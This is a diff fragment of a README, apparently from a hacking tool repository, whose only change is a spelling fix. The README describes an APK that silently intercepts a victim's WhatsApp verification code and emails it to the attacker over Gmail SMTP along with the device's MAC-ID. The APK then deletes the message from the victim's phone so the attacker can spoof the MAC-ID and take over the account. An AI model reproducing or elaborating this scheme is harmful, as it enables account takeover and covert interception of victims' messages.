jayprajapati/python-script/README.md

 ##### and All set!
 * After installing APK, apk will check for incoming message silently on background.
 * As soon as we request the OTP for victim's phone number.
-On recieving Whatsapp OTP, our apk will send OTP message to us using built-in GMAIL SMTP and also sends message to us along with MAC-ID of victim's android device.
+On receiving Whatsapp OTP, our apk will send OTP message to us using built-in GMAIL SMTP and also sends message to us along with MAC-ID of victim's android device.
 * And delete OTP message from victim's device for security.
 * After this we can SPOOF MAC-ID and use the OTP of victim's Whatsapp.